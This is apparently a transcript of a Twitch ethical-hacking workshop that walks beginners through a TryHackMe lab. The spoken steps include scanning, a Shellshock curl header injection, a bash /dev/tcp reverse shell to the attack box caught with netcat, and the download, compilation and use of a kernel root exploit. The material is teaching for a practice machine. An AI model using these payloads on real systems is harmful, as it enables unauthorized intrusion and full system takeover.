Mic check 1 2, mic check 1 2. Hey guys, can you hear me? All right. Yeah, is the volume okay? Is it low? Is it high? Just right. That's what I like to hear. Okay. Hello, everybody. So I assume that everybody is here for the cybersecurity workshop. Type "I love cybersecurity" if you are. DIY Trying says, "I'm just here for the lulz." Well, I appreciate that too. Uh, so how many people here are new to the Twitch platform? One of the great things about the Twitch platform is being able to share emotes in chat. This is probably the most famous Twitch emote on the site. This is called the Kappa, and the Kappa indicates that something is sarcastic or you don't quite believe something. So if I were to type "I love cybersecurity," Kappa, then that would imply that I don't quite love cybersecurity, but I do. So it's not Kappa. But there are a lot of other emotes out there that are really fun to use while chatting. So let me get a show of hands here. So who's here to learn about some? Thank you very much, not for Scott. Thank you for the Kappa, and DIY Trying. Thank you for the rack attack. I haven't really seen that before. Rack attack, nice. Not for Scott. Not for Scott. Have I seen you before? Have you attended one of my workshops before? This is the first one. Okay. Just curious. How did you hear about this workshop through the DC 604 meetup group? Oh, in the meetup group. Okay. Yeah, yeah. So I run an interactive workshop like this once every couple of weeks, and basically it's a little guided workshop through one of the cybersecurity exercises on TryHackMe.com. We all try to have a good time, and I've tried to make these workshops as accessible to new people in the cybersecurity, new people who are new to cybersecurity as possible. Now for Scott, I'm just wondering, are you currently working in the cybersecurity industry? Are they recorded? Yes, they are recorded. Um, they will be available as video on demand (VOD) on the Twitch website on this channel for approximately 2 weeks, and a day after I run the workshop, I usually upload the VOD to. I'm an IT security manager. Oh, cool. Yeah, yeah. No, well, I appreciate you coming to the workshop. But yeah, I'll be uploading the VOD to my YouTube channel. If you search my user handle 0x Shyhat cybersecurity on YouTube, you should be able to find my channel, and all of my archived workshops are on the YouTube channel. Once this one goes up, there'll be 6 of those workshops up there. Um, they all they all follow kind of a similar format. Not for Scott says I'm an IT security manager, but no skills for hacking. Well, I mean, hacking's not Hacking's not like, it's not magic. It's just, you know, it's running programs against network services. And you know, we'll be going through it nice and slow. I'll try to explain what I'm doing as much as I can, and hopefully everybody can follow along, and you know, we can all finish the exercise together. Not for Scott, if you have not signed up for the TryHackMe website, I recommend you do that now. So you just go to tryhackme.com and register a free account because we're going to be using the platform to conduct the workshop tonight. You're set up on TryHackMe. Okay, good, good. I'm glad to hear it. But yeah, I was. Sorry, I just need to pull up my my little task list over here. So are you all Vancouver adjacent people? I mean, I guess the DC 604 meetup group is mostly for people who live in the Lower Mainland. I myself, I live in Vancouver. It's been a nice sunny day over here. And I just got my second COVID vaccine, so hopefully I don't pass out in the middle of conducting this workshop, but we'll see. Surrey, yeah, no, Surrey's a really, you know, up and coming place. I visit there. I visit there maybe once or twice a month. Lots of good food out there. Is your company out in Surrey as well? Sorry, you know, you don't have to you don't have to answer if you don't want it. It's fine. DIY Trying says, "Nice, my second dose floored me. I felt like trash for a day." Well, I'm hoping that even if it does floor me and I feel like trash for a day, it's going to be tomorrow and not today because I have a workshop to run. We're probably going to be starting our workshop in about 5 minutes or so. We'll just leave a little time for people to trail in. Not for Scott says, "Did I get Pfizer?" I did in fact get Pfizer for both of my doses. I don't know what the deal is with people not being okay with Moderna, or is it not being okay with mixing Pfizer and Moderna? Maybe I shouldn't talk too much about vaccines and stuff, you know, because it might turn political, and I certainly don't want to. I certainly don't want to have you know, anybody feeling uncomfortable about talking politics in here. But yeah, if you're new to the TryHackMe website, it is a great platform for learning cybersecurity skills. Whether you are on the offensive side with ethical hacking and penetration testing, or on the defensive side with SOC analysts and you know, like digital forensics and incident response, you can learn all sorts of good skills on the website, and all of the learning is done in little bite-sized cybersecurity challenge rooms, which you can search for depending on which subject you want to look at. You know, for example, if I wanted to look up something like SQL injection, then it'll come up with a bunch of rooms that might handle SQL injection. Or if I wanted to look up Shellshock, which is the vulnerability we're looking at tonight, no no rooms appear. Okay, maybe not that specific, but yeah, if we wanted to look up like privilege escalation, they have a bunch of rooms that are about privilege escalation if you want to learn that. But CGAM H, CGAMH, am I pronouncing your username correctly? I don't want to like pronounce people's names incorrectly because I don't want. I mean, it's just impolite to pronounce people's names incorrectly. No worries. Well, good to hear. So I guess we'll start because it's about 7:10 now. Oh, CGAMH. I'm just wondering, do you have a registered account at TryHackMe.com? Because we're gonna be using that to run the workshop. Let me just change our workshop progress. We're going to move from 0 to 1. No worries, just eating right now. Okay, hopefully you can, no worries. You can create the account, and then hopefully you can join us in the exercise. I'm gonna put the link to to our guide document that we're going to be following tonight in the chat here, and you can get that at your leisure. If you wanted to pull that up again. You can just hit !guide in the chat, and it should pull up the link for you. But in the meantime, I guess I'll start my introduction over here as a start to the workshop. Let's see. I'm going to do a very ghetto PowerPoint presentation by pulling up my PDF file of the slides and then making it full screen. Just like this. Impressive, huh? Okay, so today's workshop is the Beginner's Ethical Hacking Workshop featuring TryHackMe. My name is Kevin, but online I go by Shyhat. I am a student of ethical hacking, and I'm in my second year of study. I started studying cybersecurity about a year and a half ago. And I'm a largely self-taught student of cybersecurity. I did not go to school for this stuff. I didn't go to school for computer science, and I haven't been, I don't have a lot of experience as far as systems administration or network administration, unfortunately. But I'm trying my best. And one thing I will have you guys know is that I still consider myself a student. I am learning new skills daily, and I'm actively seeking that stuff out because I love learning about this stuff. So today's topic that we're going to be covering today is the Bash Shellshock vulnerability. The Bash Shellshock vulnerability is a mostly Linux vulnerability, and it's sorry about that. It's a command injection vulnerability in the Bash terminal program. So the Bash terminal program is the program that allows commands to be input in Linux systems, and being able to arbitrarily inject commands in there is very bad for defenders and very good for people trying to hack in. It can be used to attack and gain access to Linux systems on the internet if certain network services are exposed. This vulnerability was discovered in 2014, which was 25 years after its code was introduced into the software. So it was lying there and nobody discovered it for about 25 years. And only when some security researchers did some fuzz testing did they discover the vulnerability. So it's one of the most famous exploits and vulnerabilities out there. It even has its own special logo. That's how you can tell that a vulnerability is famous. It's because it has a logo associated with it. So let's talk about today's workshop. How are we going to conduct the workshop about the Shellshock vulnerability? We're going to conduct an ethical hacking exercise in which we compromise a computer on our network using network and IT security tools. And we're going to use these tools to find and exploit the Shellshock vulnerability on a server. So the question would be, what tools will we use? Well, let me explain. First of all, we'll be using a tool called nmap, which stands for Network Mapper. It locates computers on the network and reports which network services they are serving. Network services are things like HTTP, which is web pages, or SSH, which allows remote login access. We'll also be using the nikto web vulnerability scanner. This is a program that scans a website for information and vulnerabilities in a number of different ways. So basically, you can turn nikto loose on a website, and it'll start looking for vulnerabilities in it. It's pretty handy. We'll also be using a program called curl, or curl, and curl is a terminal URL interface program, and this program allows the getting or sending of data through URL or web syntax. So we can grab web pages and interact with them without having to open up a web browser. The last programs we'll be covering right now is netcat, and netcat is a networking utility program. It's called the Swiss Army knife of networking programs. We will use netcat to listen and catch reverse shell connection from a remote computer. All right, so that's the tools that we'll be using. So let's get ready to start the workshop. So what I want you to do is I want you to open the following URL in your web browser: https tryhackme.com/room/0day, 0 day right here. At the same time, if you would download the workshop PDF guide at this URL here, I'll just pull it up in the chat one more time in case you didn't see it previously. And so I'll see you at the TryHackMe website at the 0 day room. So it's TryHackMe room/0 day/. And let me just reset my progress on this room here. So I'm going to reset my progress here. And I'm also going to leave the room so I can show you guys fresh how to join the room. Okay, guys. So if you are on the TryHackMe website and you have navigated your way to the 0 day room, and you can see this person's lovely face over here. This is the creator of the room, who goes by the handle 0 day. If you have navigated here successfully, please type "I'm here" in chat now. So you can even add a little kappa face, "I'm here," kappa, in chat like that, and that implies that that you're a little bit your chat is sorry, your comment is a little bit cheeky. DIY trying, thank you for the kappa. While we're waiting for people to navigate to the room, I guess I'll thank the people who have followed my channel in the last little bit. So thank you very much to Cenobite Offsec. Thank you very much for joining the channel. City Boy Summer, thank you very much for joining the channel, and First Flush 87, thank you very much for joining the channel. If you want to show a little bit of support for the workshops and my channel, you can click on the follow button located on the lower right hand side of the video window. Thank you very much. Shinohara98 says he is here. Welcome, Shinohara98. We're just starting the workshop now. If you would kindly navigate to the TryHackMe website and download the PDF guide that we're going to be using today. That'd be great. All right, so I'm going to be following the PDF the PDF guide document while we work through this room, and we're going to be starting with part 1 in the document. So part 1 in the document says that we're going to press. Oh, first of all, we need to join the room. So guys, if you're here and you haven't joined the room yet, you can see the green join room button over here. Please click on that. So after you've clicked on it, then you will see that there are 2 buttons available to us here. There's a blue start attack box button, and this is going to start our attacking virtual machine that we'll be using tonight. And we can also click on this green start machine button down here, and that's going to start the victim machine that we're going to be attacking tonight. So please click on the blue start attack box button and the green start machine button now. Okay, guys. So if you've done that successfully, then you should see that there should be a countdown happening over here under active machine information, and over on the right-hand side, it should say your machine is initializing over here. If this is happening and your virtual machines are initializing, please type "they're getting ready" in chat. So I'd like to point out that that the emote that I just used in my chat message there was called PogChamp, and it's POG, capital POG, capital CHAMP, and PogChamp is an emote on Twitch that indicates that you're super excited about something. Not for Scott. Thank you very much for the PogChamp. All right, so they're getting ready. Kappa PogChamp. Yeah, Kappa has to be capitalized. Kappa PogChamp. Yeah, just like that. Anyways, so we are gonna update our workshop progress from part 1 to part 2, just to get ready for part 2. You'll know that that your machine has initialized successfully when the progress bar hits 100, and we see the desktop of our attacking machines of our attack box system. The attack box is a Linux Debian distribution virtual machine, and it has all sorts of great hacking tools installed on it. All right. All right, everybody. If you see that your attack box has initialized correctly, and you see the screen right here, please type "ready to rock" in chat now. All right, guys, that's what I like to hear. Okay, so we can dismiss this welcome message on the terminal by clicking into the terminal window and pressing enter. The first thing we're going to do in part 2 of the exercise is we're going to add our target IP to attack box host file for convenience. So you'll notice over here that that your victim machine has this IP address right here. This IP address right here is going to be different for each user. For me, it's 10.10.97.114, but in your browser, it's probably going to be something different. So we're going to, but having to type in this IP address all the time is kind of a pain in the butt. So we're going to assign this a URL, an address. so that we don't have to, we can type in the address instead of 10.10.97. Whatever over and over again. So to do that, we're going to open up a terminal window. So we can use this shortcut right here or this shortcut right here to open a terminal window in our attack box. And once there, we're going to use the following command to assign a value to this machine, to this victim machine in our hosts file inside of our attack box. So the command is going to be echo quote IP address, which for me is this right here, but for you it's going to be something else. So 10.10.this.that. Okay, and then space, and we're going to call this machine oday, 0day.thm, and then close that quote, space, and then we're going to append this line to the host file on the system by doing greater than space / etc. / hosts. Okay, so after we confirm this command, if we read the etc. host file by doing cat space / etc. / hosts, we press enter, we should see that that our IP address and oday.thm is at the bottom of the output. So guys, if you see this when you put in the cat / etc. host command, just like this, please type pogchamp in the chat, just like this, pogchamp. Guys, this is what I like to see, pogchamps all around. Okay, so we're going to move on to part 3. I'm going to update our workshop progress. We're making good time. So in part 3, our objective is to enumerate open ports on the target host. So to find out what ports are open on the target system, we're going to be using the nmap program. So nmap is going to scan the target machine and report to us which ports and services are open on the machine. So the command is nmap space 0day.thm. So we can use this this address right here instead of the IP address because we put it in the host file. So after we fire this off, it should come back very quickly, and it'll report to us that port 22, which is associated with the SSH remote login service, and port 80, which is associated with HTTP, is open. So guys, if you got this output after putting in your nmap command, please type nmap for the win in chat now, just like this. Oh, whatever way you want to, guys. Okay, I see the kappa there, Shinohara. Thank you very much. Okay, so we're going to move on to part 4 of the workshop. So in part 4, we're going to enumerate the web server with nikto. DIY trying, nmap for the win. Thank you very much. So we're going to enumerate the web server with nikto. So we're going to use the nikto web server vulnerability scanning program. The command is nikto -h, and then the address, which is 0day.thm. So nikto is going to scan the web server for all sorts of vulnerabilities and information. After we fire it off, then nikto is going to say that it's scanning this IP, and the host name is this, and the target port is this, and it tells us that the server is running the Apache web server software, version 2.4.7. Can you expand the terminal full screen? Let's see. So I'm going to full screen my terminal. We can do it by pressing this button over here, view in full screen. Okay, so I can make this nice and big now. Hold on, guys. I gotta grab the corner of this window. Right, just like that. And then we're going to increase the size of the font. I think it's Control plus. Yeah. Okay. So guys, is that better? Can you see much better now? Okay, guys. Yeah, you guys can do the same thing if you need a little more room in your terminal. I'm gonna shrink this a little bit so that it doesn't get cut off by my camera. Yeah. Thanks, guys. All right, so you should see that after nikto runs on 0day.thm, that there's something suspicious that we found, and that's this directory right here. Nikto reports that it found in the web server that there is a directory called cgi-bin, and inside cgi-bin there is a test.cgi script, and so we're dealing with the Shellshock vulnerability today, and one of the common ways to tell if to exploit the Shellshock vulnerability is by accessing a script file on a web server that's running the vulnerable version of the bash program. So we see that this is present on the web server. So we're going to try to test and see if the server is vulnerable to Shellshock. And so how do we do that? Oh, guys, I just wanted to check if you guys got the same output from nikto. If you got this output from nikto, please type nikto worked in chat, just like this. And if you want to make it a little bit sarcastic, you can add the kappa on the end. Yeah, nikto worked. All right, thanks, guys. Okay, so we're going to move on to part 5 of the workshop. And in part 5 of the workshop, we're going to use the curl program to access the CGI script on the web server. So curl is how we can access web pages without using a web browser. So the command that we're going to do to test curl for the Shellshock vulnerability is going to be the one in part 5. It's kind of long, so it's going to be curl -H and then quote user -agent colon space and then parentheses, both parentheses, and then space, and then we're going to put inside of these brackets, we're going to put a colon and a semicolon, and then space, and then after that we're going to do another semicolon, space, echo, semicolon, space, echo, semicolon, space, dash, slash user, usr/bin/ who am I, and then we're going to close out that quote, and then we're going to do space, and then we're going to give the URL of the web page that we're trying to access, which is http://0day.thm/cgi space -bin/test.cgi. It's a bit of it's a bit of a mouthful, but if you go slow, you should be able to get this all typed out. If it doesn't work, you can, if it doesn't work, you can use the up and down the up and down arrow keys to recall any of your previous commands, and try to correct the command if it didn't go through properly. But yeah, if you were able to successfully pull off the curl command and you got this answer right here, www-data, please type in chat, curl got it. So curl got it, and you can add a pog champ if you're feeling sassy. Not for Scott says curl got it. Okay, so while we're waiting for other people to catch up, so let's go through what exactly is happening from this command. So curl is going to access the script on the web server, and so inside of the header for the HTTP request, we're going to state that there's a user agent, but instead of a normal user agent, we're going to send a special string of characters, which is the hallmark of the Shellshock vulnerability. So after bash receives this string of characters right here, sorry, not the final semicolon. So this string of characters right here, it'll interpret anything that it receives after that as a command that bash executes. So after this, it executes echo echo, and then it accesses the program user bin who am I, and user bin who am I is a program which returns the current user, and because the Apache web server runs as the www-data user on Linux systems running Apache, this is what we get as the output, and this means that Shellshock is present on the web server, and that means that we can exploit the web server by exploiting the Shellshock vulnerability. So let's move on to part 6 of our workshop, and in part 6 of the workshop, we're going to gain access to the server via the Shellshock vulnerability. So the first thing we're going to do, cgamh says, I got hello world. Well, I mean, you can make it say hello world too if you want it to. But yeah, how we're going to access the web server with the Shellshock is first we're going to, well, first I'm going to shrink this a little bit. And second, I'm going to open a new terminal window. So we can just click on this shortcut right here to open a new terminal window. I'll make this a little bigger so you guys can see. And then we're going to set up a netcat listener. So a netcat listener is a program which listens for incoming connections. You can set up the netcat listener. Not for Scott says, I got hello world and then realized I needed spaces in. Oh, okay. Yeah, you know, the output can be a little bit tricky. Sometimes the syntax has to be kind of concise. So we're going to set up our netcat listener in this part of the workshop, and we're going to do that by giving the following command: nc for netcat, and then space dash nlvp, which are the parameters that set up the listener, and then we're going to give it a port, and we'll use port 443. If you feel like giving it a different port, you can do that, you know, as well. Okay, so if you did this correctly, it should give you the output listening on 0.0.0.0 on port 443. And then next, we're going to give the command to the web server, which gives us reverse shell connection. And to do that, I'm just going to pull this up a little bit so you guys can see a little bit better. We're going to give another curl command, but it's going to be slightly different. We can pull up our old curl command just by, where is it? Where is that thing? Okay, well, we can copy this as well. So the beginning is going to be the same, just like this. You can copy this inside of a Linux terminal with Control-Shift-C. Not just Control-C, but Control-Shift-C. And then you can paste it with Control-Shift-V. So that's a handy tip for working with Linux. And the rest of the command, we're going to give it a little space. The rest of the command is /bin /bash space -i, and then it's going to be greater than ampersand space greater than ampersand space /dev /tcp/, and then we're going to give the IP address of our attack box. So the IP address of the attack box is located at the top of each one of these terminal windows. So yours is going to be up here. So we're going to put that in. For me, it's going to be 10.10.this.that. It'll be different for you. And then after that, we're going to give a slash and then the port number, 433 space. And then it's going to be 0 greater than ampersand 1. And then we're going to close out the quote, and then space, and then we're going to give the URL of the script file again, which is http://0day.thm/cgi-bin/test.cgi, just like this. It's a bit of a mouthful. You might have to, you might get a typo like me here with, look over your command carefully and compare it to the string in the guide PDF to see that it matches up. If it does, fire it off, and after you do, you should see that in your second terminal that you've received a connection from your netcat listener. So it should say connection from the victim machine, and it'll say bash no job control in the shell, and it should say www-data@ubuntu, just like this. So guys, if you got access to the web server by exploiting the Shellshock vulnerability, put on your favorite hacker voice and say, "I'm in," just like this. And I don't know, maybe PogChamp? Yeah. That's right, DIY trying. You should use the glitch cat. So there's glitch cat, and there's also cool cat as emotes as well. Yeah, and that's probably better. I'm in, and then cool, and then glitch cat. Oh, I spelled that wrong. It needs an L. That's right. Okay, so let's see. Not for Scott is in. Glitch cat. Thank you. I'm glad to hear it. Hack the Planet says CGAMH. Hack the Planet indeed. So CGAMH also illustrates another of my favorite emotes on Twitch, which is the lull emote, which indicates something funny. All right, so let's move on to the next part of the workshop, This is going to be workshop part 7. In workshop part 7, we're in. So let's see. In part 7, our objective is to capture the user flag. So guys, in cybersecurity, cybersecurity exercises like this, they're called capture the flag exercises, or CTFs. They're usually flag files. And flag files, when you can access them, indicate a certain level of access on the system. In these kind of networking CTF exercises, there's a user flag which indicates that you've gained low level user access, and it's usually in a user's home directory. So for us, we're going to do change directory cd/home, and then we're going to ls to list what's in the directory. There's a user called Ryan, so we're going to enter his directory, cd space Ryan, and then ls to list the contents of that directory. And there is a flag file called user.txt. So we're going to read this file, and so that's basically, it's called capturing the flag. So cat space user.txt, and our flag is going to be thm shellshock rocks. Okay, so we can copy this. Okay, so we're going to stop because that's the end of part 7. That's the end of part 7. If you successfully capture the user flag, please type got the user flag and type LUL in all caps, and to tell me, yeah, got it. All right, that's what I like to hear. Got the user flag. Okay. All right, guys. So we're going to move on to part 8 of the exercise. And in part 8, we're going to answer the first question and the task 1 header. I didn't know what I was looking at when I got in. Well, hopefully you've found your bearings. So we're in the home/Ryan directory, and that's where the user flag is. Guys, what I want you to do is I want you to copy this this string right here with Control-Shift-C, and then I want you to go to the TryHackMe webpage, and I want you to answer the first question in the room by pasting it in here. So if you're still in this view, you didn't full screen your virtual machine, what you're going to have to do is you're going to have to press this button in the middle here to access the clipboard for the virtual machine, and you'll see that the output is here. You're going to have to go in here and manually copy this again in order to paste to like a non-attack box source. So guys, if you've answered the first question in the web page and submitted it successfully, just like this, please type Shellshock rocks in chat. You can add the leet speak if you want to. I'm not. Thank you for the flag, Cgam H. Thank you very much. All right, so Control-Shift-C to copy and what to paste? Sorry, OPSEC, don't worry. Not for Scott. Control-Shift-C to copy, and if you're pasting to a non-terminal window, it's just Control-V to paste. But if you're copying into a terminal window, you have to do Control-Shift-V to paste. It's a bit of a quirk with Linux. All right, so guys, we're going to move on to the next part of the workshop. Next part of the workshop is part 9. Okay, so in part 9, we're going to find a way to elevate user access on the system. Elevating user access on the system in CTF exercises is called privilege escalation. So we're going to escalate our user privileges. So first of all, in our netcat terminal, I'm going to go back to my full screen view. Oh, it's gone funny. Well, I'm going to close this, and then I'm going to full screen from here again. Okay. So in our netcat terminal window, which is www-data, we're going to find out what version of the operating system we're running. So the command is going to be uname space -a. And that's going to give us, the output is going to tell us exactly what version of Linux is running on the system. So we're running Linux Ubuntu 3.13. So this is an old version of Ubuntu, and it's going to have to be because newer versions of Ubuntu typically aren't vulnerable to Shellshock. So what we're going to do is we're going to sorry, we're going to try to find out if this version of Ubuntu is vulnerable to what is known as kernel exploits. And kernel exploits are software bugs in the operating system. So we're going to go to we're going to use our favorite search engine. I'm just going to use Google. And we're going to search for potential kernel exploits in this version of Ubuntu Linux. So it's going to be Ubuntu 3. I got to spell that right. Ubuntu 3.13 space kernel exploit. So the kernel is the software that runs the operating system. So we're going to find out if there's Ubuntu 3.130-32 generic says cgamh. Yeah, well, I mean, we could search for that too. I try to keep it a little looser so we get more search results. The first result that I get in Google is going to be for this exploit right here in exploitdb.com. Build 1337. Yeah, it would have to be build 1337, wouldn't it? We're going to navigate here to take a look at the exploit. So we can see that the exploit is going to be local privilege escalation, which is what we're looking for, and it's for the version of Ubuntu that's running on the system. This is C code. So what we're going to do is we're going to have to make a copy of this file and put it on the victim system, and after doing that, we're going to have to compile it on the system from the C file. So to do that, first of all, we're going to go over here, and we're going to view this file as raw code. So it brings us here. And then we're going to copy everything. We're going to copy everything on the page. And then, so we're going to copy, and then we're going to go back to our virtual machine. We're not going to go back to the netcat listener, to the netcat terminal. We're going to go to our other terminal window, and we're going to start an editor, a text editor. The text editor is nano, and the command is going to be nano space exploit.c. Guys, we're going to take a little break to let everybody catch up. But after you started your nano text editor, what I want you to do is I want you to Control-Shift-V to paste all the exploit code into there. Guys, if you finished part 9 and you finished part 10, what I want you to do is I want you to type in chat exploit ready, and then give it a cool cat. Oh no, give it a glitch cat. Oh, exploit ready says CYAM, and he's got the what face. Man, I haven't seen that in a while. So what face is an emote that that you use when you want to express that something is scary. New to Twitch, no problem, no problem. Uh, we're all here to learn and to try new things. But yeah, after you've copied the exploits, the exploit code to the exploit C file in the nano editor, you can Control X to exit, and then it'll ask you to save the modified buffer, and you press Y to say yes to save, and file to name here. What I want you to do is just press enter to use the same file name. Random pick. I should buy the lotto. Yeah. Well, CGAM, I don't want to condone gambling, but if you really want to, you can try. So to make sure that the file saved correctly, you can read the file cat exploit.c, and it should have all that code, all that juicy code, right there. You can't lose if you don't play. That's very true. So guys, let's see, who's Shinohara. I'm just wondering, did you manage to copy the exploit code to your nano text editor properly? If not, we can wait for a little bit. Shinohara says, "Yep, okay, that's good to hear." So we're going to move on to part 11 of the exercise. Only a few more parts to go, guys. So we're going to make the exploit file available by HTTP, then download the file to the victim server. So how do we do that? So our exploit file is on our attack box, but we want to get this file from the attack box to the victim server. So first of all, we're going to make the file available to download by hosting a little HTTP server from our attack box. We're going to do that with the Python program. Python is a scripting language program that you can also use to do all sorts of handy things. So the command is going to be python3-m space http.server space 8080. So what this command is going to do is Python is going to serve the contents of this directory on the internet on port 8080. CGAMH says, "Can you pipe it through with the Shellshock command?" Well, I mean, and DIY Trying says, "PogChamp over and over again." Can we pipe it through with the Shellshock command? Well, that's not what we want to do. What we want to do is we want to put the exploit C file on the victim server, and we can do that pretty easily by serving it over HTTP. So we're going to go ahead with this Python command, and now we're going to be serving this directory on our attack box on port 8080. So, and on our netcat terminal, we're going to download the file. DIY Trying says, "Technically you could, but it would put the file in the www directory, which you might not have write permissions on." That's true. Well, yeah, that's true. That's very true. The www data user that we have right here doesn't necessarily have write permissions in a lot of places. So what we're going to do, cgamh says load in RAM. Yeah, potentially, but we're just gonna stick to the guide document, and we're going to go to a writable directory. In this case, it's going to be temp cd slash tmp, and once here in the temp directory, we're going to do wget to download something from the internet, or from other locations. So wget space, and then our attack box IP, which is over here at the top of the terminal, 10.10. Whatever your attack box IP is, and then it's going to be colon 8080 because we're serving the HTTP server on port 8080, and then slash exploit.c. Alright guys, so after we give this command, it's going to download the exploit.c file from our attack box. Alright, so guys, we'll type ls to see if we receive the file, and it's right here. Guys, if you manage to download the exploit.c file, please type exploit get in chat, and then cool cat. Yeah. Exploit get cool cat. DIY trying, that's the way to do it. Thank you very much. Okay guys, we're gonna move on to the next part. We're on part 12 out of 15. We're getting there. Exploit, CGAM says exploit got not like this. Oh, okay. Not like this is another emote on Twitch that you use to indicate that that something bad happened. But here it's funny. It's funny. So thank you very much, CGAMH. So in part 12, we're going to compile the exploit file and then do some troubleshooting. So to compile a C file on a Linux server, usually we use the GCC command, so the GCC compiler. And we're going to specify the file that we're going to compile, exploit.c, and then the output file. So -o space exploit. We're just going to call this exploit after we compile it. So when we press enter, okay, GCC is going to throw up an error. So error, it says that trying to execute this file, cc1, no such file or directory. So we see that GCC, the compiler tried to access some directory it couldn't. This isn't normal. So what we're going to do is we're going to do a little bit of troubleshooting. We're going to echo our system path. So echo space $path, and I didn't know for the longest time, I didn't know what the path did, but after educating myself, I found out that the path is these are the directories in the Linux system where commands can be executed without referring to the exact file location, and there's a bunch of directories, and they're all separated by these colons here. So user local bin, user local sbin, user bin, user sbin, bin, and sbin. But we see that in the path there's this period at the end of the path. So this is a typo, and because there's a typo here, it can potentially mess up the pathing. So when GCC tried to access one of the files that it needs to compile, because of this typo here, it couldn't access it. So what we're going to do, isn't that a path reference? I'm not sure what you're referring to, CGAMH. But yeah, the oh, the period. The period is a path reference. Yeah, maybe. I'm not completely sure about this. But what I do know is that what we need to do is we need to reset the path in order to have GCC work correctly. And we're going to fix the path in our session with the following command. So the command is going to be export path equals, and then we're going to set a new path for our session, which is user/local /bin colon user/local/sbin sbin colon /user/bin colon /user/sbin colon /bin colon /sbin. This is long. What you can try to do is you can try to copy the command from the guide PDF and then paste it into your terminal window. If you full screened your terminal window, you shouldn't have any problems. If you're still in the split screen, then you're going to have to paste it into the clipboard before you can paste it into the terminal window. But yeah, after you input the command, let me just make sure that I didn't make a typo here. User/bin local bin, user local sbin, user bin, user sbin, bin sbin. Echo out path and copy fix. Right. So let's try echoing the path again. So it should echo the correct path without the period at the end. Okay. So guys, so if our path is correct, then we should be able to compile our exploit from the C file with the following command: gcc space exploit .c space -o for output exploit, just like this. Okay, so we ls to list the file contents, and there is a file called exploit that was compiled. Guys, if you managed to successfully get GCC to compile the exploit.c file, please type in chat exploit compiled and then PogJam. PogJam. Okay, CGAMH already rooted the system, and he says seems good. He's getting ahead of us. I mean, you know, I appreciate the initiative. All right, guys. So before this, that was part 13. Sorry for not stopping at the end of 12. But the last part of part 13 is we're at ls-la. We can see that the so LA is going to give us extra information when we list out the file contents. We can see that the exploit file that we created, oh, it is executable. Huh. I thought I had to manually do that. Okay, so it's executable. So we're going to do part 14. You DIY Trying says he hacked the Gibson. You guys are getting ahead of me. I'm trying to go by the book, guys. Okay, so part 14, we're going to run the exploit file and capture the root flag. So the exploit file, we're going to run it, and to run a command in our current directory, we have to, in Linux, we have to do /. period slash and then the name of the file in a current directory. So period slash exploit. So after we run the file, okay. So the file is going to go off, and it's going to exploit the kernel vulnerability on the old OS, and then we can type who am I, and it says we are root. CGamH says I lost my shell. Well, you can get it back. You can get it back by starting up your netcat listener again and then sending the curl command again, and it should give you another shell. DIY Trying says I am Groot. Yeah, exactly. Ryan, the exploit doesn't give me root. Do I need to recompile? Ryan, the exploit doesn't give you root. Do I need to recompile? So what I would do is I would fix the path again with the export command that we used in the previous step, because in order to have the GCC compiler work correctly, we have to fix our path every time. Oh, okay. So try chmod plus x exploit and then rerun it. Yeah, it might be that the exploit didn't set the executable. So you should do ls-la, and exploit should have an x in this space right here. If it doesn't, that means it's not executable. But guys, what we're gonna do, if we do who am I and we are root, who am I, and we are root, we're going to grab the root flag for the system. Note, environment settings are important. Yes, they are important. All the small details, they're very important to pay attention to. We're going to go to the root directory, cd/root and ls-la, and we'll see that there is a root.txt file in here. That is the root flag for the CTF exercise, capture the flag. And we can access it because we're the root user. So we're going to capture the root flag with cat space root.txt, and it'll give us the message, THM, good job, 0 days, pleased. So guys, if you manage to capture the root flag, then please type in chat, flags all done in chat. And then lol. Yeah. DIY Trying. I haven't seen this one. What's this? FB touchdown. Oh, okay. I haven't seen this one before. I haven't seen that emote before. But guys, let's see. CGamH, I'm wondering, did you manage to get the exploit file working? Did you reestablish your shell on the Did you reestablish your shell on the victim machine? To start, no, not back yet. But yeah, I mean, first, get your shell back by running the netcat listener command in one terminal, and then in the second terminal, you want to run your curl command to open the reverse connection to your netcat listener. But for everybody else, let's okay. So CGamH, the next thing you want to do is you want go back to the temporary directory, and then ls-la, to check to see that there is a... So in the temp directory, you need to check if the exploit file is still there. If it's there and it has the X right here in the information, it says then it's executable, and you should try to use the exploit file by doing /exploit like this, and that'll run the exploit program. But for the rest of us, please copy the root flag string right here with Control-Shift-C, and then go to the TryHackMe page. And in the TryHackMe page, you want to go over here and paste in your root flag, and then submit, and that will end the exercise. And it says, congratulations, you've completed the room. CGAMH says, I did a find on the last session, probably wasn't done. Last session wasn't done. Yeah. So if you don't have the exploit file compiled in the temp directory, then you need to reset the path with the export command that we used previously, and then try to recompile the exploit.c file with the GCC compiler. But for the rest of us guys, if you completed the room and you get this nifty little message here, please type in chat room rooted in chat, and then glitchcat, coolcat, pogchamp. But room rooted, yeah. Okay. Got behind, but just caught up. Not for Scott. Yeah, if you need any help completing the rest of the steps in the room. Oh, room rooted. Not for Scott. Yeah, I'm glad to see that you caught up again. CGAMH, that emote that you used right there is called Craigasm, and Craigasm is an emote that indicates that something sexy happened, and I guess rooting the room is something sexy, and we can celebrate with some Craigasms. Wait, how do you spell that? Craigasm. That just like that. All right, guys. So let's do a little wrap up. So I want a Charizard. The Charizard is, what is that? Pock Charizard. Pock Charizard is the name of that emote. I'm gonna do a little recap of what we did in the workshop with my scuffed PowerPoint presentation. Guys, summary. What did we do? Well, we scanned the target computer for open services. We found that the server was vulnerable to the Shellshock vulnerability. And so the Shellshock vulnerability, we exploited Shellshock to gain foothold access to the server. And then we found and exploited an OS kernel vulnerability to gain root access. So that's those are the steps we took to complete the exercise. So let's talk a little bit about the bash Shellshock vulnerability and how we can remediate, or how we can defend ourselves against it. First of all, if you're not running an old version of Linux, then you're good. You shouldn't have to do anything special to protect yourself from Shellshock. But if you're running, if for some reason you're running an old version of Linux on your server, then the bash program might be vulnerable to Shellshock. Shellshock affects servers with operating systems running bash versions 1.03 to 4.03. So it made it all the way from 1.03 to 4.03 before it was detected. That's 25 years. It's kind of gross. But upgrading the Linux OS to the latest version should update the bash program to the latest version, and you know, it should make us safe from the Shellshock vulnerability. But if you can't do that for some reason, then remove any script files, .cgi, .sh, .pl, etc. From web directories, and then disable access to identified vulnerable services, such as SMTP, which isn't always possible, but you know, this is something you could try if you wanted to remediate your bash Shellshock vulnerability. Do you guys have any questions? Where do I continue from here? Where can I find more educational resources? Please ask your questions now. But first of all, let's show some love to the author of this TryHackMe room. What we're going to do is, I'm going to close my attack box. In the TryHackMe page, in 0 day, you know, with the picture of the lovely author right here, we can thumbs up. We can thumbs up this room to indicate that we like the content. So, you know, show 